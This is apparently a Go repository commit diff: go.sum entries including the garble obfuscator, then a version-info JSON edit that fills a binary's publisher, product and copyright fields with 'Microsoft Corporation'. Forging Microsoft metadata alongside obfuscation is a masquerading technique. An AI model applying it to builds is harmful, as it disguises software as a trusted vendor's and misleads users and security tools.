golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
golang.org/x/tools v0.1.1-0.20210304221016-50ca8d007de9 h1:lQ9QDTM4SHDP/S/bmj2wjNMQ93AvRYf7kuoqr2MDxmc=
golang.org/x/tools v0.1.1-0.20210304221016-50ca8d007de9/go.mod h1:9bzcO0MWcOuT0tm1iBGzDVPshzfwoVvREIui8C+MHqU=
golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE=
golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
gopkg.in/errgo.v2 v2.1.0/go.mod h1:hNsd1EY+bozCKY1Ytp96fpM3vjJbqLJn88ws8XvfDNI=
mvdan.cc/garble v0.2.0 h1:EcSXSbx2ocE42m1tpbSPh0MBu6uYewWj82qyWfXjr7s=
mvdan.cc/garble v0.2.0/go.mod h1:9htOtPZGNFoUyS7Y/R/T7vfnEi386kmsOAhNEoc24ts=
+1013 -828
View File
File diff suppressed because it is too large Load Diff
+10 -27
View File
@@ -11,33 +11,16 @@
"Minor": 0,
"Patch": 0,
"Build": 0
},
"FileFlagsMask": "",
"FileFlags ": "",
"FileOS": "",
"FileType": "",
"FileSubType": ""
},
"StringFileInfo": {
"Comments": "",
"CompanyName": "",
"FileDescription": ".",
"FileVersion": "",
"InternalName": "",
"LegalCopyright": "",
"LegalTrademarks": "",
"OriginalFilename": "",
"PrivateBuild": "",
"ProductName": "",
"ProductVersion": "",
"SpecialBuild": ""
},
"VarFileInfo": {
"Translation": {
"LangID": "",
"CharsetID": ""
}
},
"IconPath": "",
"ManifestPath": ""
"StringFileInfo": {
"CompanyName": "Microsoft Corporation",
"FileDescription": "Microsoft Corporation",
"FileVersion": "Microsoft Corporation",
"InternalName": "test",
"LegalCopyright": "Microsoft Corporation",
"OriginalFilename": "Microsoft Corporation",
"ProductName": "Microsoft Corporation",
"ProductVersion": "Microsoft Corporation"
}
}